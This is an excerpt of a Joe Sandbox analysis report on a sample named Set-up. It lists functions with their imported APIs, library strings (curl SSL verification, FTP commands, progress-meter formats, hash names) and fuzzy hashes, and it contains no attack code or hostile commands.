Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 60fdf185321d71b77c17128ac75242e5021d0b49bdd4bd6d2be6d06b24295c34
Instruction ID: 392988841fb1725e92808131fef898d7516e1cd90097dca8d81bd199b1b86579
Opcode Fuzzy Hash: 60fdf185321d71b77c17128ac75242e5021d0b49bdd4bd6d2be6d06b24295c34
Instruction Fuzzy Hash: F0D0A771904309CFCB007E5888C150A3398BAA5314FC4055CDD849B742D7359514CBC3

Function 006ECBC0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,006C7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,006C40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006ECBD2

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 03d00744cccb0195c85fdeb29e3c5646062b90311961c77265dbda542f29f244
Instruction ID: f07b3c16c9b2b575bcf3460134605e7eaa8ac8e69b8616c5ff99b6829f1c6129
Opcode Fuzzy Hash: 03d00744cccb0195c85fdeb29e3c5646062b90311961c77265dbda542f29f244
Instruction Fuzzy Hash: 3CB092AA909280EBFA066A09B893C2B7652F690720F980821F505C59B1DA219C16E983

Function 0089B180 Relevance: 1.3, APIs: 1, Instructions: 8sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 0089B18E

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: da51679177561965cb7843f00dd78e3202e64db6bc7a2e286ca744164354a97e
Instruction ID: 9231302a43076b18fc9702266fc46ed234a5e95316f907474054dfcf00087d6b
Opcode Fuzzy Hash: da51679177561965cb7843f00dd78e3202e64db6bc7a2e286ca744164354a97e
Instruction Fuzzy Hash: F1C04CB5C1464047D700BF38D64A21DBAE47B49204FC10E68E98595195F738D3188653

Non-executed Functions

Function 005862E0 Relevance: 123.9, APIs: 9, Strings: 72, Instructions: 2363stringCOMMON

Download Yara Rule

APIs

strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Unknown error), ref: 00586E74
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00586F8A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00587184
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00587263
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 005875B8

Part of subcall function 006DF870: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000800), ref: 006DF8AE

Strings

issuer: %s, xrefs: 005871CE
Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s, xrefs: 0058736B
Invalid OCSP response status: %s (%d), xrefs: 005877F8
No OCSP response received, xrefs: 005879D8
SSL: certificate subject name '%s' does not match target hostname '%s', xrefs: 00588133
/%s, xrefs: 00587489, 00587741
expire date: %.*s, xrefs: 005870E2
subjectAltName does not match %s %s, xrefs: 00587B11
Could not get peer certificate chain, xrefs: 00588122
Error computing OCSP ID, xrefs: 0058806E
Subject, xrefs: 0058648C
SSL certificate verify ok., xrefs: 0058809E
: , xrefs: 005878FE
pub_key, xrefs: 00586AD6, 00586BC4
Error getting peer certificate, xrefs: 00588153
Version, xrefs: 0058654F
Unknown error, xrefs: 00586E6A, 00586E72, 00587941, 00587949
Server, xrefs: 00586F06, 00586F10
%02x:, xrefs: 00586CE8
dsa, xrefs: 00586B71, 00586B90, 00586BAE, 00586BC9
Start date, xrefs: 00586887
Signature, xrefs: 00586D1F
ipv6 address, xrefs: 00587AD7
subjectAltName: host "%s" matched cert's IP address!, xrefs: 00587607
SSL certificate status: %s (%d), xrefs: 005883B6
[NONE], xrefs: 00587011
SSL: could not get peer certificate, xrefs: 00586FD5
SSL: could not get X509-issuer name, xrefs: 005872C2
rsa, xrefs: 00586C56, 00586C75
<, xrefs: 00587F90
BIO_new return NULL, OpenSSL error %s, xrefs: 00586E7D, 00587E52
SSL certificate issuer check ok (%s), xrefs: 00587CAF
Serial Number, xrefs: 005865F1
BIO_new_mem_buf NULL, OpenSSL error %s, xrefs: 00587954
SSL certificate verify result: %s (%ld), xrefs: 00587FB0
Remove session ID again from cache, xrefs: 00587DD4
SSL: illegal cert name field, xrefs: 00588078
unexpected ssl peer type: %d, xrefs: 00587621
vtls/openssl.c, xrefs: 00587BD2, 00587F54, 00588217, 00588278, 00588293
%s certificate:, xrefs: 00586F11
Could not find certificate ID in OCSP response, xrefs: 0058840A
Issuer, xrefs: 005864EF
RSA Public Key, xrefs: 00586C31
common name: %s (matched), xrefs: 00587F17
%lx, xrefs: 00586524
Expire date, xrefs: 005868EE
SSL: Unable to open issuer cert (%s), xrefs: 00587232
Unable to load public key, xrefs: 005869DB
SSL: unable to obtain common name from peer certificate, xrefs: 00587F29
SSL certificate verify result: %s (%ld), continuing anyway., xrefs: 00587D38
hostname, xrefs: 00587AE1, 00587B10, 00587B29
subject: %s, xrefs: 00587021
SSL: Unable to read issuer cert (%s), xrefs: 00587995
No error, xrefs: 00586E65, 0058793C
pqg, xrefs: 00586A29, 00586A7E, 00586B13, 00586B6C
OCSP response has expired, xrefs: 00588414
Signature Algorithm, xrefs: 005866A6
OCSP response verification failed, xrefs: 0058814C
Cert, xrefs: 00586D7F
%s/%s, xrefs: 00586E01, 005878D8
Invalid OCSP response, xrefs: 00587D4B, 005880B1
%02x, xrefs: 005865C8
SSL: public key does not match pinned public key, xrefs: 005882B2
ipv4 address, xrefs: 00587AD2
OpenSSL, xrefs: 00586DFC, 005878D3
SSL certificate revocation reason: %s (%d), xrefs: 005883F1
subjectAltName: host "%s" matched cert's "%s", xrefs: 005880EC
start date: %.*s, xrefs: 0058707C
Public Key Algorithm, xrefs: 00586725
SSL: Certificate issuer check failed (%s), xrefs: 00587867
Proxy, xrefs: 00586F01
SSL: no alternative certificate subject name matches target %s '%s', xrefs: 00587B2A

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpy$memcmpmemsetstrcpystrlen
String ID: Unable to load public key$ Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s$ SSL certificate issuer check ok (%s)$ SSL certificate verify ok.$ SSL certificate verify result: %s (%ld), continuing anyway.$ common name: %s (matched)$ expire date: %.*s$ issuer: %s$ start date: %.*s$ subject: %s$ subjectAltName does not match %s %s$ subjectAltName: host "%s" matched cert's "%s"$ subjectAltName: host "%s" matched cert's IP address!$%02x$%02x:$%lx$%s certificate:$%s/%s$/%s$: $<$BIO_new return NULL, OpenSSL error %s$BIO_new_mem_buf NULL, OpenSSL error %s$Cert$Could not find certificate ID in OCSP response$Could not get peer certificate chain$Error computing OCSP ID$Error getting peer certificate$Expire date$Invalid OCSP response$Invalid OCSP response status: %s (%d)$Issuer$No OCSP response received$No error$OCSP response has expired$OCSP response verification failed$OpenSSL$Proxy$Public Key Algorithm$RSA Public Key$Remove session ID again from cache$SSL certificate revocation reason: %s (%d)$SSL certificate status: %s (%d)$SSL certificate verify result: %s (%ld)$SSL: Certificate issuer check failed (%s)$SSL: Unable to open issuer cert (%s)$SSL: Unable to read issuer cert (%s)$SSL: certificate subject name '%s' does not match target hostname '%s'$SSL: could not get X509-issuer name$SSL: could not get peer certificate$SSL: illegal cert name field$SSL: no alternative certificate subject name matches target %s '%s'$SSL: public key does not match pinned public key$SSL: unable to obtain common name from peer certificate$Serial Number$Server$Signature$Signature Algorithm$Start date$Subject$Unknown error$Version$[NONE]$dsa$hostname$ipv4 address$ipv6 address$pqg$pub_key$rsa$unexpected ssl peer type: %d$vtls/openssl.c
API String ID: 838718518-248801092
Opcode ID: 4c4839ec930244d4ac24b9323c11f7ebd5d5c6ad38e1bfd6d28716659da79cfb
Instruction ID: ccde5355403253fafed9e6e5e0f88f2326ba9a1902f3f97802a0db8594543516
Opcode Fuzzy Hash: 4c4839ec930244d4ac24b9323c11f7ebd5d5c6ad38e1bfd6d28716659da79cfb
Instruction Fuzzy Hash: F80329B5904345ABE720BA109C46B7B7B99BF94308F08482CFD4D66293FB75EA14C793

Function 0089E050 Relevance: 119.3, APIs: 64, Strings: 3, Instructions: 2082COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 0089E0B3
localeconv.MSVCRT ref: 0089E0BE
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0089E149
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0089E179
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089E1D8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089E1FA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089E20F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0089F886

Strings

d, xrefs: 0089EAAF
nil), xrefs: 008A041D
, xrefs: 0089FED0

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: free$isspacelocaleconv$_errno
String ID: $d$nil)
API String ID: 577766270-394766432
Opcode ID: da12185a3ad2f3ed3f6661a58f06188013cb9c1348c848796238c5ff28226d76
Instruction ID: e24f9541369aac9a477d24009d18d40cb2110f617728626abac16975163bd7c5
Opcode Fuzzy Hash: da12185a3ad2f3ed3f6661a58f06188013cb9c1348c848796238c5ff28226d76
Instruction Fuzzy Hash: 621359706083458FDB24EF28C48062ABBE1FF9A754F28492DE995DB361D771EC45CB82

Function 0055E480 Relevance: 91.8, APIs: 25, Strings: 27, Instructions: 803COMMON

Download Yara Rule

Strings

Failure sending EPRT command: %s, xrefs: 0055EF6C
???, xrefs: 0055EADC, 0055EAE1, 0055ED2B, 0055ED31, 0055ED96, 0055ED9C
EPRT, xrefs: 0055EF42
[%s] ftp_state_use_port(), listening on %d, xrefs: 0055ED9D
[%s] ftp_state_use_port(), opened socket, xrefs: 0055EAE2
REST %d, xrefs: 0055E4A6
PRET %s, xrefs: 0055E5FF
bind(port=%hu) failed: %s, xrefs: 0055ED00
bind(port=%hu) on non-local address failed: %s, xrefs: 0055EBC6
[%s] ftp_state_use_port(), socket bound to port %d, xrefs: 0055ED32
NLST, xrefs: 0055E5F6, 0055E5FE
PRET RETR %s, xrefs: 0055E5D9
STOP, xrefs: 0055C3C6, 0055EA55
PRET, xrefs: 0055E656
failed to resolve the address provided to PORT: %s, xrefs: 0055E9DD
socket failure: %s, xrefs: 0055E9D5
RETR_PREQUOTE, xrefs: 0055E562
PORT, xrefs: 0055EED7
getsockname() failed: %s, xrefs: 0055E905, 0055EC1B
Failure sending PORT command: %s, xrefs: 0055EF05
[%s] -> [%s], xrefs: 0055C2D2, 0055C3D2, 0055C596, 0055E45F, 0055E4FF, 0055E56E, 0055E662, 0055EA61
bind() failed, we ran out of ports, xrefs: 0055EB15
%s %s, xrefs: 0055EEDC
PRET STOR %s, xrefs: 0055E607
LIST, xrefs: 0055E5F1
%s |%d|%s|%hu|, xrefs: 0055EF47
,%d,%d, xrefs: 0055EEBF

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$LIST$NLST$PORT$PRET$PRET %s$PRET RETR %s$PRET STOR %s$REST %d$RETR_PREQUOTE$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
API String ID: 0-1921080684
Opcode ID: 9ac3eb4e883c7b16a5c565f44bffe18d468417c7942c3c2be98e071b8aed4568
Instruction ID: 234aeb6b23d900ea1fd3b770c0b74cab2c47467a0eb69983b5e052f93bfcf72f
Opcode Fuzzy Hash: 9ac3eb4e883c7b16a5c565f44bffe18d468417c7942c3c2be98e071b8aed4568
Instruction Fuzzy Hash: C652F2716043019BD7189B24DC5AB6B7FE9FF94306F08486AFC8587292E731DE49C7A2

Function 0051E620 Relevance: 62.3, APIs: 29, Strings: 6, Instructions: 1028COMMON

Download Yara Rule

APIs

fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 0051E6F1

Strings

.%d, xrefs: 0051EE0E
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0051E9AA, 0051EAEB
(nil), xrefs: 0051ECCD
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 0051E68E, 0051E9AF, 0051EAF0
0, xrefs: 0051EBCA
-, xrefs: 0051EC74

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: fputc
String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 1992160199-2555271450
Opcode ID: ac6bfa5fda1b57edfad15e19f8ef9d6dee72e7af30df3e3314a80fbf3b406702
Instruction ID: 29ed66a577d346f7c52a37912abf010b22232abd70aebd346f9ff7ed0d03d83b
Opcode Fuzzy Hash: ac6bfa5fda1b57edfad15e19f8ef9d6dee72e7af30df3e3314a80fbf3b406702
Instruction Fuzzy Hash: E7828F71A083419FE714CE18C88576ABBE1FFC5324F188A2DF9A997291D770DC85CB52

Function 00524940 Relevance: 25.2, APIs: 1, Strings: 13, Instructions: 731COMMON

Download Yara Rule

APIs

Part of subcall function 0052D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,005201B1), ref: 0052D8E2

fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 005252A5

Strings

** Resuming transfer from byte position %lld, xrefs: 00524AE9
Callback aborted, xrefs: 00524A7C
%7lldd, xrefs: 00524E50, 00524F9A, 005250C3
-:--, xrefs: 00524FC8
-:--, xrefs: 00524F08
%2lld:%02lld:%02lld, xrefs: 00524DA4, 00524EEA, 00525047
--:-, xrefs: 00524FD0
--:-, xrefs: 00524F10
%% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 00524AFC
--:-, xrefs: 00524DC6
-:--, xrefs: 00524DBE
%3lldd %02lldh, xrefs: 00524E35, 00524F7F, 005250AB
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s, xrefs: 0052528E

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: CounterPerformanceQueryfflush
String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
API String ID: 1125614567-122532811
Opcode ID: 6f0c1a7c778bcc78a03cfafe4fd25449d6df5c85912017e55bd7c6e142a02b87
Instruction ID: f45037d8120aae95f888f974b08c7cf3d35396d32d25cea39f8bd9378cf9a5fb
Opcode Fuzzy Hash: 6f0c1a7c778bcc78a03cfafe4fd25449d6df5c85912017e55bd7c6e142a02b87
Instruction Fuzzy Hash: 7142E671B08711AFD708DE28DC85B6BBAEAFFC4700F04892CF549972D1E775A9148B92

Function 007A0170 Relevance: 23.2, APIs: 8, Strings: 7, Instructions: 704COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000040), ref: 007A0374
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000080), ref: 007A0395
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008), ref: 007A049D
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000004), ref: 007A04E7
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?), ref: 007A055F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000298,?,?), ref: 007A057A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 007A0618
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,0000005C,?), ref: 007A06E3

Strings

SHA2-384, xrefs: 007A0B62
SHA2-512, xrefs: 007A0BA5
SHA1, xrefs: 007A01F7
@, xrefs: 007A0B42
SHA2-256, xrefs: 007A0B05
SHA2-224, xrefs: 007A0238
MD5, xrefs: 007A0194

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: @$MD5$SHA1$SHA2-224$SHA2-256$SHA2-384$SHA2-512
API String ID: 1297977491-3776850024
Opcode ID: cf752726697d4d615f7e18be7c478bba7384cbb1f8d579cab639f2ee23ab9887
Instruction ID: 4eace3310266efaccd85fa8140460ab065557f29beaacff7fc177370c5a1fddb
Opcode Fuzzy Hash: cf752726697d4d615f7e18be7c478bba7384cbb1f8d579cab639f2ee23ab9887
Instruction Fuzzy Hash: BE5283729087818BD711CF28D845BABB7E5BFDA344F048B2DF9C893252E7749944CB92

Function 006EE270 Relevance: 22.7, APIs: 15, Instructions: 238filestringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 006EE28D
FindNextFileW.KERNEL32(?,00000000), ref: 006EE2BB
